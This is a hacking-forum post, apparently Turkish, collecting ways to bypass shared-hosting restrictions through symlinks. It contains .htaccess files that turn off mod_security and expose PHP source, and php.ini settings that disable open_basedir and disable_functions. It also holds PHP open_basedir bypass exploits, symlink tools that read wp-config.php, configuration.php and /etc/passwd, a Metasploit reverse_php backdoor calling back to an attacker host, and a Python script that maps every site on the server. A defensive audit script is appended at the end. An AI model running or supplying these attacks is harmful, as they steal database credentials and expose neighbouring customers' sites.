- Topic Title => Techniques for Bypassing Linux and Windows Servers with ByPass Symlink .htaccess .php.ini OVH Hosting LiteSpeed Server Restriction Bypass Vulnerability [ 19.09.2017 ]
- Original Topic Link => https://www.cyberizm.org/cyberizm-tum-linux-win-server-bypass-symlink-htaccess-teknikleri.html
- Prepared by => KingSkrupellos - Cyberizm Digital Security Team
- Article You Must Read Before Reading Any of This =>
- Disabling Safe Mode on Servers: Detailed Explanation
- [hide][code]https://www.cyberizm.org/cyberizm-sunucularda-guvenlik-modunu-devre-disi-birakma-detayli-anlatim.html[/code][/hide]
- SOME Video Walkthroughs on the Topic =>
- [video=youtube]https://www.youtube.com/watch?v=OU7gakFAEf0[/video]
- [video=youtube]https://www.youtube.com/watch?v=dQ1y1GSiobA[/video]
- [video=youtube]https://www.youtube.com/watch?v=5dkb8aHknYg[/video]
- [video=youtube]https://www.youtube.com/watch?v=y2V1VK7w77c[/video]
- [video=youtube]https://www.youtube.com/watch?v=CNMRkOY225I[/video]
- [video=youtube]https://www.youtube.com/watch?v=nNVk5AxKsIE[/video]
- [video=youtube]https://www.youtube.com/watch?v=drcru-MI2sI[/video]
- [video=youtube]https://www.youtube.com/watch?v=-DIasGdWimM[/video]
- [video=youtube]https://www.youtube.com/watch?v=0POx2Gsrrxs[/video]
- [video=youtube]https://www.youtube.com/watch?v=1kggQCF79DE[/video]
- Contents =>
- 1) - [ Bypass Directory ]-
- 2) Bypass Symlink with .htaccess
- 3) LiteSpeed Bypass [SymLink]
- 4) Litespeed Symlink 403 Forbidden Bypass
- 5) - [ Include symlink ]-
- 6) - [ Bypass Litespeed ] -
- 7) - [ ByPass OVH Hosting ]-
- 8) - [ Bypass Symlink 403 forbidden ] -
- 9) Bypass symlink via .htaccess 2016
- 10 ) ByPass Passwd in LiteSpeed: General Logic
- 11 ) Bypass Symlink (Priv8) Code
- 12 ) PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
- 13 ) Server Bypass OVH & BlueHost Symlink Code 2014
- 14 ) Symlink Bypass 404
- 15) Internal Server Error ByPass Error and Its Fix Code
- 16) Metasploit Bypass Backconnect & Get Domainowners
- 17 ) Server Bypass read and edit file with python script Work On (Linux,Win)
- __________________________________________
- - [ Bypass Directory ]-
- [code]<Directory "/home/user/public_html">
- Options -ExecCGI
- AllowOverride AuthConfig Indexes Limit FileInfo options=IncludesNOEXEC,Indexes,Includes,MultiViews ,SymLinksIfOwnerMatch,FollowSymLinks
- </Directory>[/code]
- Bypass Symlink with .htaccess
- [code]
- OPTIONS Indexes Includes ExecCGI FollowSymLinks
- AddHandler txt .php
- AddHandler cgi-script .pl
- AddHandler cgi-script .pl
- OPTIONS Indexes Includes ExecCGI FollowSymLinks
- Options Indexes FollowSymLinks
- AddType txt .php
- AddType text/html .shtml
- Options All
- Options All[/code]
- LiteSpeed Bypass [SymLink]
- [code]
- python shell , CGI PERL Shell
- and .htaccess
- the htaccess code is
- Options Indexes FollowSymLinks
- DirectoryIndex ssssss.htm
- AddType txt .php
- AddHandler txt .php
- <IfModule mod_autoindex.c>
- IndexOptions FancyIndexing IconsAreLinks SuppressHTMLPreamble
- </ifModule>
- <IfModule mod_security.c>
- SecFilterEngine Off
- SecFilterScanPOST Off
- </IfModule>
- Options +FollowSymLinks
- DirectoryIndex Sux.html
- Options +Indexes
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- ===============
- what we should do ?
- just open the cgi bypass shell
- and do sym
- ln -s /home/user/public_html/wp-config.php 1.txt
- then
- cat 1.txt[/code]
- Litespeed Symlink 403 Forbidden Bypass
- [code]
- Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any
- DirectoryIndex new
- DirectoryIndex config.ini[/code]
- - [ Include symlink ]-
- [code]
- Options Indexes FollowSymLinks
- DirectoryIndex ssssss.htm
- AddType txt .php
- AddHandler txt .php[/code]
- - [ Bypass Litespeed ] -
- [code]
- wew.shtml
- do ==> ln -ls /home/user/public_html/configuration.php wew.shtml
- .htaccess
- Options +FollowSymLinks
- DirectoryIndex chesss.html
- RemoveHandler .php
- AddType application/octet-stream .php[/code]
- - [ Bypass OVH ]-
- [code]
- .htaccess
- Options +FollowSymLinks
- DirectoryIndex Index.html
- Options +Indexes
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType root .root
- AddHandler cgi-script .root
- AddHandler cgi-script .root
- php.ini
- safe_mode = Off
- disable_functions =
- safe_mode_gid = Off
- open_basedir = Off
- register_globals = on
- exec = On
- shell_exec = On
- ln -s / CoderSec[/code]
- - [ Bypass Symlink 403 forbidden ] -
- [code]
- .htaccess
- Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any[/code]
- Bypass symlink via .htaccess 2016
- [code]
- OPTIONS Indexes Includes ExecCGI FollowSymLinks
- AddHandler txt .php
- AddHandler cgi-script .cgi
- AddHandler cgi-script .pl
- OPTIONS Indexes Includes ExecCGI FollowSymLinks
- Options Indexes FollowSymLinks
- AddType txt .php
- AddType text/html .shtml
- Options All
- Options All[/code]
- ByPass Passwd in LiteSpeed: General Logic
- [code]
- A good way to bypass forbidden error when reading passwd file
- The general approach:
- ln -s / etc / passwd passwd.txt
- Opening the passwd file this way returns a forbidden error.
- For bypass =>
- One of the following two commands is used to bypass it:
- ln -s /etc/passwd README
- ln -s /etc/passwd HEADER
- The second command is run in a directory, and when we go back to that directory the passwd file is shown to us.
- SPT to b0x
- Bypass Symlink (Priv8)
- How you can bypass Symlink in linux webserver ?
- 1/ Create a folder
- 2/ Upload inside
- ".htaccess"
- CODE:
- Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any
- 3/ Bypass manually
- ln -s /home/user/public_html/t0ph4cking.txt
- Bypass Symlink 403 Forbidden with .htaccess
- Options all
- DirectoryIndex Sux.html
- AddType text/plain .php
- AddHandler server-parsed .php
- AddType text/plain .html
- AddHandler txt .html
- Require None
- Satisfy Any[/code]
- Simple Bypass Internal Server Error Symlink 2016
- [code]
- Options Indexes FollowSymLinks
- DirectoryIndex linuxsec.htm
- AddType txt .php
- AddHandler txt .php[/code]
- PHP 'symlink()' 'open_basedir' Restriction Bypass Vulnerability / PHP 5.2.12/5.3.1 symlink open_basedir bypass
- [code]
- <?php
- /*
- PHP 5.2.11/5.3.0 symlink() open_basedir bypass
- by KingSkrupellos - Cyberizm Digital Security Team
- CHUJWAMWMUZG
- */
- $fakedir="cx";
- $fakedep=16;
- $num=0; // offset of symlink.$num
- if(!empty($_GET['file'])) $file=$_GET['file'];
- else if(!empty($_POST['file'])) $file=$_POST['file'];
- else $file="";
- echo '<PRE><img
- src="http://www.cyberizm.org/"><P>This is exploit
- from <a
- href="http://securityreason.com/" title="Cyberizm PHP">Cyberizm
- Lab - SecurityReason</a> labs.
- Author : KingSkrupellos
- <p>Script for legal use only.
- <p>PHP 5.2.11 5.3.0 symlink open_basedir bypass
- <p>More: <a href="http://cyberizm.org/">Cyberizm</a>
- <p><form name="form"
- action="http://'.$_SERVER["HTTP_HOST"].htmlspecialchars($_SERVER["PHP_SELF
- "]).'" method="post"><input type="text" name="file" size="50"
- value="'.htmlspecialchars($file).'"><input type="submit" name="hym"
- value="Create Symlink"></form>';
- if(empty($file))
- exit;
- if(!is_writable("."))
- die("not writable directory");
- $level=0;
- for($as=0;$as<$fakedep;$as++){
- if(!file_exists($fakedir))
- mkdir($fakedir);
- chdir($fakedir);
- }
- while(1<$as--) chdir("..");
- $hardstyle = explode("/", $file);
- for($a=0;$a<count($hardstyle);$a++){
- if(!empty($hardstyle[$a])){
- if(!file_exists($hardstyle[$a]))
- mkdir($hardstyle[$a]);
- chdir($hardstyle[$a]);
- $as++;
- }
- }
- $as++;
- while($as--)
- chdir("..");
- @rmdir("fakesymlink");
- @unlink("fakesymlink");
- @symlink(str_repeat($fakedir."/",$fakedep),"fakesymlink");
- // this loop will skip allready created symlinks.
- while(1)
- if(true==(@symlink("fakesymlink/".str_repeat("../",$fakedep-1).$file,
- "symlink".$num))) break;
- else $num++;
- @unlink("fakesymlink");
- mkdir("fakesymlink");
- die('<FONT COLOR="RED">check symlink <a
- href="./symlink'.$num.'">symlink'.$num.'</a> file</FONT>');
- ?>
- PHP Symbolic Link Open_Basedir Bypass Vulnerability
- script1.php
- <?
- symlink("a/a/a/a/a/a/", "dummy");
- symlink("dummy/../../../../../../etc/passwd", "xxx");
- unlink("dummy");
- while (1) {
- symlink(".", "dummy");
- unlink("dummy");
- }
- ?>
- script2.php
- <?
- while (1) {
- print @file_get_contents("xxx");
- }
- ?>[/code]
- Symlink Bypass 404
- [code]
- <? /*KingSkrupellos Symlink Bypass 404*/ @error_reporting(0);@ini_set('display_errors', 0); echo '<title>Cyberizm SYM404</title><body bgcolor=silver><center><form method="post"><br>File Target : <input name="fl" value="/home/user/public_html/configuration.php"> <input name="anu" type="submit" value="SYM"></form><br>';if($_POST['anu']){
- rmdir("sl");mkdir("sl", 0777);$fl = $_POST['fl'];system("ln -s ".$fl." sl/x.txt");symlink($fl,"sl/x.txt");$anu = fopen("sl/.htaccess", "w");
- fwrite($anu,"ReadmeName x.txt");
- echo'<a href=sl/x.txt>CHECK</a>';
- }[/code]
- Server Bypass OVH & BlueHost Symlink Code 2014
- [code]
- ".htaccess":
- #Bypass By Cyberizm.Org
- <DIRECTORY /..../user/..../>
- OPTIONS Indexes ExecCGI FollowSymLinks
- AllowOverride All
- </DIRECTORY>
- AddType txt .php
- AddHandler txt .php
- "php.ini":
- #Bypass By Cyberizm.Org
- safe_mode = OFF
- disable_functions = NONE
- safe_mode_gid = OFF
- open_basedir = OFF
- register_globals = ON
- exec = ON
- shell_exec = ON[/code]
- Internal Server Error ByPass Error and Its Fix Code
- [code]
- Sometimes, when working with a CGI telnet shell on a server, you get an annoying "internal server error". There are many ways to fix it, but the most reliable one is to log in to cPanel, go to the MIME types section and write on the first line
- application/x-httpd-cgi
- then write the extension of your CGI shell on the second line; for example, if your CGI shell is named ali.veli, write veli on the second line and confirm, then go to the browser and refresh the address where that CGI shell is located. Before doing this refresh, we must not forget to give chmod 755 to our CGI shell named ali.veli.
- First, before uploading the CGI to our server, we open our Perl code and at the very top we write
- #!/usr/bin/perl -I/usr/local/bandmain and upload it to our server.
- If you still get an error on the server, I would like you to try the Web Shell CGI
- http://archive.is/UT8xf Here it is
- .htaccess code :
- Options +FollowSymLinks
- DirectoryIndex seees.html
- Options +Indexes
- Options +ExecCGI
- AddHandler cgi-script cgi pl wasRewriteEngine on
- RewriteRule (.*)\.was$ $1.was[/code]
- Metasploit Bypass Backconnect & Get Domainowners
- [code]
- ////////////////////SET UP BACKDOOR////////////////////
- use payload/php/reverse_php
- set LHOST [You Wan Ip] set LPORT 22
- set ENCODER php/base64
- generate -t raw
- ////////////////SET UP LISTENING/////////////////
- use exploit/multi/handler
- set LHOST [You Lan IP] set LPORT 22
- set payload php/reverse_php
- exploit
- /////////////////// RUN BACKDOOR////////////////
- php /home/yfnvpnvb/domains/quangcaonewstar.com/public_html/test.php
- //////////////////CAT /ETC/PASSWD//////////////
- cat /etc/passwd > passwd.txt
- ///////////////////CAT USER-DOMAIN/////////////
- cat /etc/virtual/domainowners > domain.txt[/code]
- ____________________
- Symlink 404 Not Found Script
- [code]
- #!/usr/bin/env python
- #Symlink Script by KingSkrupellos
- #Creates Symlinks and makes a neat PHP index of sites in the dir "kidsymx"
- #Version 1.1
- #Minor fixes
- #
- #contact me @ Cyberizm Digital Security Team
- #Cyberizm
- import os,sys,re
- if not os.path.exists('kidsymx'):
- os.makedirs('kidsymx')
- os.chdir('kidsymx')
- hta='Options Indexes FollowSymLinks\nDirectoryIndex kSym.php\nAddType txt .php\nAddHandler txt .php\n'
- x=open('.htaccess','w')
- x.write(hta)
- x.close()
- print '[+] htaccess created'
- h="<html><head><title>kidSym</title><style>table,tr,td{padding: 7px 10px 7px 10px ; border: 1px solid black;} .menf{font-color:lime; font-size:11px; font-weight:bold;}</style></head><body bgcolor=#98FF98><center>
- <h1>
- kidSym</h1>
- <p class=menf>
- KingSkrupellos
- greetz:Cyberizm Digital Security Team</p>
- <table >"
- os.system("ln -s / kid.txt")
- if os.path.exists('kid.txt'):
- print "[+] Symlink Created"
- else:
- print "[-] Unable to Create Symlink"
- usrs=[]
- sitesx=[]
- z=open("/etc/passwd","r")
- z=z.read()
- z=re.findall('/home\w*?/\w+',z)
- for usr in z:
- usrs.append(usr)
- sites=os.listdir("/var/named/")
- for site in sites:
- site=site.replace(".db","")
- sitesx.append(site)
- #php making
- path=os.getcwd()
- if "/public_html/" in path:
- path="/public_html/"
- else:
- path="/html/"
- counter=1
- indx=open("kSym.php","w")
- indx.write(h)
- for userx in usrs:
- for sitex in sitesx:
- u=userx.split("/",2)[2][0:5]
- s=sitex[0:5]
- if u==s:
- indx.write("
- <tr><td style=font-family:calibri;font-weight:bold;color:grey;>%s</td><td style=font-family:calibri;font-weight:bold;color:red;>%s</td><td style=font-family:calibri;font-weight:bold;><a href="kid.txt%s%s" target="_blank">%s</a></td>"%(counter,userx.split("/",3)[2],userx,path,sitex))
- counter=counter+1
- print "[+] Site index Complete"
- print "[*] %s Sites found" %str(counter)
- print "[+] Happy Hacking ./KingSkrupellos Cyberizm Digital Security Team"[/code]
- That's all. Happy Hacking. Mr. KingSkrupellos Cyberizm Digital Security Team
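A defender-side check for the patterns collected above, as an added example that is not part of the original paste: it walks one hosting account's web root, flags `.htaccess` directives of the kinds shown here (PHP remapped to a non-PHP type or handler, symlink following enabled, `Satisfy Any` / `Require None`, `ReadmeName` / `HeaderName`) and reports symlinks that resolve outside that root. The rule labels and the function name `audit_docroot` are this example's own.

```python
import os
import re

# Directive patterns that recur in the .htaccess snippets on this page.
# Labels and function names are this example's own (hypothetical).
RULES = [
    ("php-handler-remapped", re.compile(
        r"^\s*(?:AddType|AddHandler)\s+(?!\S*php)\S+\s+(?:\S+\s+)*\.php\b", re.I)),
    ("php-handler-removed", re.compile(
        r"^\s*RemoveHandler\s+(?:\S+\s+)*\.php\b", re.I)),
    ("symlinks-followed", re.compile(
        r"^\s*Options\s+(?:\S+\s+)*(?:\+?FollowSymLinks|All)\b", re.I)),
    ("access-control-relaxed", re.compile(
        r"^\s*(?:Satisfy\s+Any|Require\s+None)\b", re.I)),
    ("autoindex-file-inclusion", re.compile(
        r"^\s*(?:ReadmeName|HeaderName)\s+\S+", re.I)),
]


def audit_docroot(root):
    """Return sorted (relative path, finding) pairs for one account's web root."""
    root = os.path.realpath(root)
    findings = set()
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if os.path.islink(path):
                # A link that resolves outside the account's own tree
                target = os.path.realpath(path)
                if os.path.commonpath([root, target]) != root:
                    findings.add((rel, "symlink-escapes-docroot -> " + target))
            elif name == ".htaccess" and os.path.isfile(path):
                with open(path, errors="replace") as fh:
                    for line in fh:
                        findings.update(
                            (rel, label) for label, rx in RULES if rx.search(line))
    return sorted(findings)


if __name__ == "__main__":
    import sys
    for rel, finding in audit_docroot(sys.argv[1] if len(sys.argv) > 1 else "."):
        print(rel, finding, sep="\t")
```

Whether a tenant's `.htaccess` may set these directives at all is decided by the server's `AllowOverride` line, such as the one in the first snippet on this page.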